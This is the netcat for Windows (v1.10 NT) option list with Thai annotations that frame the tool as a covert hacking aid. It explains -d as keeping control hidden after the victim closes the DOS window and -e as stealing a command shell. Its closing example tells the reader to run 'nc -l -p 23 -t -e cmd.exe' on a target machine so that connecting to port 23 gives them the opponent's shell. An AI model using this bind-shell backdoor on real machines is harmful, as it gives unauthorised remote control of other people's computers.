[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d เป็นการเข้าควบคุมอย่างลับ แบบลักลอบ คือแม้เหยื่อจะปิดหน้าต่างดอสไปแล้ว โปรแกรมก็จะทำงานอยู่ครับต้องไป entask อย่างเดียวครับ
-e prog ใช้ในการสั่งให้โปรแกรมทำงาน เมื่อเข้าเครื่องเป้าหมายโดย prog แทนที่ด้วยโปรแกรมที่จะสั่ง run เมื่อควบคุมได้แล้ว โดยปรกติแล้วโปรแกรมที่จะตามหลัง option นี้คือ cmd.exe เพื่อขโมยหน้าต่างดอส
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h help
-i secs ใช้กำหนดเพื่อหน่วงเวลา เป็นวินาที ในการสแกน port
-l โหมดการรอฟัง เพื่อการเข้าไปติดต่อ
-L รอฟัง เพื่อการเข้าไปติดต่อ แต่จะรับได้หลาย connection (หลายการเชื่อมต่อ)
-n ใช้ในการดู DNS server เครื่องเป้าหมาย ใช้ร่วมกับ -v
-o file ใช้เพื่อเขียน log.txt บันทึกเหตุการณ์ เป็นเลขฐาน 16
-p port ใช้เป็นตังระบุ port ต่างๆในการสแกน หรือ การรอฟัง จะใช้ร่วมกับ option อื่นๆ
-r randomize local and remote ports
-s addr local source address
-t ใช้ในการรับส่งข้อมูลทาง telnet ทางไกลจากเครื่อง server
-u UDP mode
-v ใช้ในการเอาข้อมูลจากเครื่องเป้าหมายมาเก็บไว้ เวลาใช้ -v < get.txt เป็นการเก็บข้อมูลในไฟล์ get.txt แต่ถ้าไม่ใช้ < get.txt ก็จะแสดงออกมาทางจอภาพ
-w secs เป็นตัวตั้งเวลาการรอคอย เช่นการแสกน ว่าจะให้รอ packet กลับมานานเท่าไหร่
-z เป็น option ที่ใช้สำหรับแสกนเครื่องเป้าหมาย
port numbers can be individual or ranges: m-n [inclusive]
**ตัวอย่าง**
ในการที่จะไปติดต่อกับเครื่องเป้าหมาย เราต้องเอาโปรแกรมนี้ไปรันที่เครื่องเป้าหมายก่อน โดยใช้
nc -l -p 23 -t -e cmd.exe โดยคำสั่งนี้จะทำให้เครื่องเป้าหมาย รอฟังการติดต่อจากเรา ที่ port 23 และเมื่อเรา connect เข้าไปที่ port 23 เราก็จะได้ dos ฝ่ายตรงข้ามมาใช้
